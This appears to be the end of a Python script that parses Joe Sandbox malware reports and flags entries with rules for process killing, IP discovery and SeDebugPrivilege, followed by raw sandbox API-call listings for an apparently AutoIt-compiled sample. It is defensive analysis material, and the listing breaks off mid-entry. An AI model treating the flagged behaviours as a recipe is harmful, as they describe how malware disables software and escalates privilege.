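    """Split the report text into one Entry per 'Uniqueness Score' block."""
    entries, cur = [], Entry()
    for line in text.splitlines():
        if line.strip().startswith("Uniqueness Score"):
            entries.append(cur)
            cur = Entry()
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.groups()
            setattr(cur, key.lower().replace(" ", "_"), val.strip())
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.add(normalize(m.group(1)))
    return entries


# Rule table (author's own names). A rule fires when every required API is either in the
# parsed APIs list or, as a fallback for entries with an empty list, a substring of API ID.
RULES = {
    "process-kill-loop": {"CreateToolhelp32Snapshot", "Process32First", "OpenProcess", "TerminateProcess"},
    "local-ip-discovery": {"gethostname", "gethostbyname", "inet_ntoa"},
}
STRING_RULES = {"debug-privilege": "SeDebugPrivilege"}


def flag(entry):
    hits = [r for r, need in RULES.items()
            if all(n in entry.apis or n in entry.api_id for n in need)]
    hits += [r for r, s in STRING_RULES.items() if s in entry.string_id]
    return hits


def analyze(text):
    """Return one finding per entry that matched at least one rule."""
    findings = []
    for e in parse_entries(text):
        hits = flag(e)
        if hits:
            findings.append({"opcode_id": e.opcode_id[:16], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f["opcode_id"], ", ".join(f["hits"]))
```

The API ID fallback is deliberately weak: Joe Sandbox builds that field by concatenating name fragments, so substring matching on it can miss (and, for short names, false-positive); prefer the parsed APIs list whenever the entry has one, as the SeDebugPrivilege entry does.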
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F42C8
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 001F43D7
                                                                                                    • _wcslen.LIBCMT ref: 001F43E7
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F457C
                                                                                                      • Part of subcall function 001E15B3: VariantInit.OLEAUT32(00000000), ref: 001E15F3
                                                                                                      • Part of subcall function 001E15B3: VariantCopy.OLEAUT32(?,?), ref: 001E15FC
                                                                                                      • Part of subcall function 001E15B3: VariantClear.OLEAUT32(?), ref: 001E1608
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: 714e7387152afaaa03bbfd59c45583927962e91b8302cbba82bfde75f6327831
                                                                                                    • Instruction ID: 71f4a217a07c82681c7ffa2dedc6a253922e4223a603ff40f1a926a88f0cf1a0
                                                                                                    • Opcode Fuzzy Hash: 714e7387152afaaa03bbfd59c45583927962e91b8302cbba82bfde75f6327831
                                                                                                    • Instruction Fuzzy Hash: 749166756083059FC704EF68C48096AB7E5FF98314F14892DF98A9B351DB30ED46CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 00202AE2
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00202B14
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00202B3C
                                                                                                    • _wcslen.LIBCMT ref: 00202B72
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00202BAC
                                                                                                    • GetSubMenu.USER32(?,?), ref: 00202BBA
                                                                                                      • Part of subcall function 001D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 001D42E6
                                                                                                      • Part of subcall function 001D42CC: GetCurrentThreadId.KERNEL32 ref: 001D42ED
                                                                                                      • Part of subcall function 001D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001D2E43), ref: 001D42F4
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00202C42
                                                                                                      • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 1e1bf567f204240042676c4734875f115e53c510b00106bb31a2c88d114ba3aa
                                                                                                    • Instruction ID: 9e312c2e31c51b160c8b17725a9a2cd0ea5a96a103f46857dd98beb51fa0a544
                                                                                                    • Opcode Fuzzy Hash: 1e1bf567f204240042676c4734875f115e53c510b00106bb31a2c88d114ba3aa
                                                                                                    • Instruction Fuzzy Hash: 3271B435A10315EFCB10EFA4C849AAEB7F5EF58314F11845AE816EB382DB74ED418B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 00208896
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 002088A2
                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0020897D
                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 002089B0
                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 002089E8
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00208A0A
                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00208A22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 4072528602-0
                                                                                                    • Opcode ID: e0afe05438e4b7d82593679c6965c7330be69f0416a19fefb7d594004486917e
                                                                                                    • Instruction ID: dae39c8804b53df26380ae8afea2ae5acae7ea6b8b6e304ba73b9b6406a30dce
                                                                                                    • Opcode Fuzzy Hash: e0afe05438e4b7d82593679c6965c7330be69f0416a19fefb7d594004486917e
                                                                                                    • Instruction Fuzzy Hash: 9771BC3461030AAFEF219F54C884FBBBBB9EF49310F544459E985973A3CB31A960CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001D80D1
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001D80F7
• SysAllocString.OLEAUT32(00000000), ref: 001D80FA
• SysAllocString.OLEAUT32 ref: 001D811B
• SysFreeString.OLEAUT32 ref: 001D8124
• StringFromGUID2.OLE32(?,?,00000028), ref: 001D813E
• SysAllocString.OLEAUT32(?), ref: 001D814C
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 98c2ccd18e250a59c5e7e8f7fff53727eecf40810fa43583de69486b63456a22
• Instruction ID: 30059424687779054d23ed7721392f1f51617b5e2216dfdf539bc8abc04c1e55
• Opcode Fuzzy Hash: 98c2ccd18e250a59c5e7e8f7fff53727eecf40810fa43583de69486b63456a22
• Instruction Fuzzy Hash: 8C218375201214BFDF109FA8DC88DAA77ECEB493607048126F915CB3A1DB70EC4ACB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(0000000C), ref: 001E0DAE
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E0DEA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 0d5e3f3e62d222ce2388249738ab4f5fcb33a1a21bc423cfd4f7006a1c523ad5
• Instruction ID: a407c3b9f95502e9c7fc2f7f3ed75d8885cb1b37cfe69e8d857ee602ccace9a4
• Opcode Fuzzy Hash: 0d5e3f3e62d222ce2388249738ab4f5fcb33a1a21bc423cfd4f7006a1c523ad5
• Instruction Fuzzy Hash: 5A217174500745AFDB218FA6DC04A9EBBE4BF59720F204E29F9A1D72D1E7B19C90CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00177759
  • Part of subcall function 0017771B: GetStockObject.GDI32(00000011), ref: 0017776D
  • Part of subcall function 0017771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00177777
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00204A71
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00204A7E
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00204A89
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00204A98
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00204AA4
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 26e39b986286231de110c61bef1d3e64f354336d3a5e0054a374e54a29bef21f
• Instruction ID: 36dc9a7d4fd7062ba7249b74cdb9532c8979efeedfe492a46a5c42af0af58cc0
• Opcode Fuzzy Hash: 26e39b986286231de110c61bef1d3e64f354336d3a5e0054a374e54a29bef21f
• Instruction Fuzzy Hash: 2611B6B225021DBEEF119F64CC85EE77FADEF09758F008111FB18A6091C7719C219BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001DE23D
• LoadStringW.USER32(00000000), ref: 001DE244
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001DE25A
• LoadStringW.USER32(00000000), ref: 001DE261
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 001DE2A5
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 001DE282
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: fc8071bbf6691be4d60be2a3d5ca1e7d6747716340fbe87c312cd794e8dca396
• Instruction ID: adc9494756b460bfa253ac85cdf3ab309f36d402d03b898564bd34ce93721bd8
• Opcode Fuzzy Hash: fc8071bbf6691be4d60be2a3d5ca1e7d6747716340fbe87c312cd794e8dca396
• Instruction Fuzzy Hash: 6A011DF6900308BFE711A7E4AD8DEE7776CDB08305F414592B74AE6142EA749E848B71
Uniqueness
Uniqueness Score: -1.00%

APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001F271D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001F273E
• WSAGetLastError.WSOCK32 ref: 001F274F
• htons.WSOCK32(?,?,?,?,?), ref: 001F2838
• inet_ntoa.WSOCK32(?), ref: 001F27E9
  • Part of subcall function 001D4277: _strlen.LIBCMT ref: 001D4281
  • Part of subcall function 001F3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001EF569), ref: 001F3B9D
• _strlen.LIBCMT ref: 001F2892
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: 0898930d9f1932521dfc15d72b509135a6140e7f2a3552e7757606568e1cd96a
• Instruction ID: dcc10cda0165c40d395f817ff4b23776f68aa516adb74199192c87863db21b83
• Opcode Fuzzy Hash: 0898930d9f1932521dfc15d72b509135a6140e7f2a3552e7757606568e1cd96a
• Instruction Fuzzy Hash: 95B1F071204304AFD324DF64C895E3A7BF5AF98318F54854CF69A8B2A2CB71ED46CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 001A044A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A0466
• __allrem.LIBCMT ref: 001A047D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A049B
• __allrem.LIBCMT ref: 001A04B2
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001A04D0
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
• Instruction ID: 837388c7e56d5707ee6a693e528beaaa421cbd0d2984933d13b9f65d1d2096c6
• Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
• Instruction Fuzzy Hash: 9881F97AA007069FDB269E78CC81B6A73E8BF5E724F24412EF611D7291E770D9008791
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00198669,00198669,?,?,?,001A67DF,00000001,00000001,8BE85006), ref: 001A65E8
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001A67DF,00000001,00000001,8BE85006,?,?,?), ref: 001A666E
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001A6768
• __freea.LIBCMT ref: 001A6775
  • Part of subcall function 001A3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00196A99,?,0000015D,?,?,?,?,001985D0,000000FF,00000000,?,?), ref: 001A3BE2
• __freea.LIBCMT ref: 001A677E
• __freea.LIBCMT ref: 001A67A3
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 15469e303f4b81a48c543ea970f358835e7b428163d12cc51de0605bddea5d94
• Instruction ID: fbcc9bd5efee93d33aa15992e948516a846229d89b2e04cb700b8c9c3d49947c
• Opcode Fuzzy Hash: 15469e303f4b81a48c543ea970f358835e7b428163d12cc51de0605bddea5d94
• Instruction Fuzzy Hash: 9B51F57A610216AFDB258FA4CC81EBF77AAEF56754F194228FC14D6150EB38DC40C6A0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
                                                                                                      • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC629
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001FC684
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FC6C9
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001FC6F8
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001FC752
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001FC75E
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(00000035), ref: 001D0049
• SysAllocString.OLEAUT32(00000000), ref: 001D00F0
• VariantCopy.OLEAUT32(001D02F4,00000000), ref: 001D0119
• VariantClear.OLEAUT32(001D02F4), ref: 001D013D
• VariantCopy.OLEAUT32(001D02F4,00000000), ref: 001D0141
• VariantClear.OLEAUT32(?), ref: 001D014B
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001CFB8F,00000000,?,?,00000000,?,001B39BC,00000004,00000000,00000000), ref: 00208BAB
• EnableWindow.USER32(?,00000000), ref: 00208BD1
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00208C30
• ShowWindow.USER32(?,00000004), ref: 00208C44
• EnableWindow.USER32(?,00000001), ref: 00208C6A
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00208C8E
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 001F2C45
  • Part of subcall function 001EEE49: GetWindowRect.USER32(?,?), ref: 001EEE61
• GetDesktopWindow.USER32 ref: 001F2C6F
• GetWindowRect.USER32(00000000), ref: 001F2C76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001F2CB2
• GetCursorPos.USER32(?), ref: 001F2CDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001F2D3C
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
• _wcslen.LIBCMT ref: 001E61D5
• CoInitialize.OLE32(00000000), ref: 001E62EF
• CoCreateInstance.OLE32(00210CC4,00000000,00000001,00210B34,?), ref: 001E6308
• CoUninitialize.OLE32 ref: 001E6326
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D210F
• UnloadUserProfile.USERENV(?,?), ref: 001D211B
• CloseHandle.KERNEL32(?), ref: 001D2124
• CloseHandle.KERNEL32(?), ref: 001D212C
• GetProcessHeap.KERNEL32(00000000,?), ref: 001D2135
• HeapFree.KERNEL32(00000000), ref: 001D213C
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00174154: _wcslen.LIBCMT ref: 00174159
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001DCEAE
• _wcslen.LIBCMT ref: 001DCEF5
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001DCF5C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001DCF8A
Strings
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00204794
• IsMenu.USER32(?), ref: 002047A9
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002047F1
• DrawMenuBar.USER32 ref: 00204804
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001D26F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001D2709
• SendMessageW.USER32(?,00000189,?,00000000), ref: 001D2739
  • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32 ref: 001CE72B
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001CE73D
• FreeLibrary.KERNEL32(00000000), ref: 001CE763
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017633E
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00176350
• FreeLibrary.KERNEL32(00000000,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176362
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00176316
• FreeLibrary.KERNEL32(00000000,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176329
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 001FAD86
